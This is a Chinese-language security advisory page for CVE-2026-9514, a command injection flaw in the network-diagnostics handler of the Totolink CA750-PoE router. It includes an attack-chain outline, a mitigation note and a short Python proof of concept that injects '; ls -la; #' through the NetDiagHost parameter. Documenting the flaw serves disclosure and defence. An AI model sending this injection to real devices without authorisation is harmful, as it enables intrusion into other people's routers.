CVE-2026-9514 CVSS 6.3 中危

CVE-2026-9514 Totolink CA750-PoE OS命令注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9514

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink CA750-PoE

漏洞概述

Totolink CA750-PoE 6.2c.510版本中的Setting Handler组件存在安全漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件的setNetworkDiag函数未正确过滤用户输入。攻击者可通过操控NetDiagHost等参数注入恶意操作系统命令，导致远程执行代码。该漏洞已被公开披露，且攻击无需用户交互，具有一定安全风险。

技术细节

该漏洞位于Totolink CA750-PoE路由器的Web管理接口中。具体受影响的是处理网络诊断设置的setNetworkDiag函数。在处理来自前端的诊断请求时，程序直接将NetDiagHost、NetDiagPingNum、NetDiagPingSize、NetDiagPingTimeOut及NetDiagTracertHop等参数传递给底层的系统命令执行环境，而未进行严格的输入验证或转义。这允许经过低权限认证的攻击者构造包含特殊字符（如;、|、&）的恶意payload，将原本的诊断命令拼接并执行任意系统指令。由于攻击向量为网络（AV:N）且无需用户交互（UI:N），攻击者可远程利用此漏洞获取服务器权限，造成信息泄露、数据篡改或服务中断。

攻击链分析

STEP 1

侦察

攻击者发现目标网络中存在Totolink CA750-PoE设备，并确认其Web管理接口开放。

STEP 2

认证

攻击者使用低权限账户（或默认凭据）登录设备的Web管理界面，满足PR:L的要求。

STEP 3

漏洞利用

攻击者向/cgi-bin/cstecgi.cgi发送特制的POST请求，在setNetworkDiag函数的NetDiagHost等参数中注入恶意命令（如; ls -la）。

STEP 4

执行与控制

服务器端未过滤参数，直接将其传递给系统Shell执行，攻击者成功获取系统权限并读取文件或进一步控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-ip/cgi-bin/cstecgi.cgi"

# Headers
headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}

# Vulnerable payload: Injecting a command to list directory contents
# The payload is injected into the NetDiagHost parameter
data = {
    "function": "setNetworkDiag",
    "NetDiagHost": "127.0.0.1; ls -la; #",
    "NetDiagPingNum": "4",
    "NetDiagPingSize": "64",
    "NetDiagPingTimeOut": "60",
    "NetDiagTracertHop": "10"
}

try:
    response = requests.post(url, json=data, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Totolink CA750-PoE 6.2c.510

防御指南

临时缓解措施

如果无法立即升级固件，建议暂时禁用设备的远程Web管理功能，并通过ACL（访问控制列表）严格限制对/cgi-bin/cstecgi.cgi接口的访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9514
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9514
3 Details https://www.cvedetails.com/cve/CVE-2026-9514/
4 VulDB https://vuldb.com/cve/CVE-2026-9514
5 Link https://github.com/wudipjq/my_vuln/blob/main/totolink4/vuln_52/52.md
6 Link https://vuldb.com/submit/813926
7 Link https://vuldb.com/vuln/365514
8 Link https://vuldb.com/vuln/365514/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表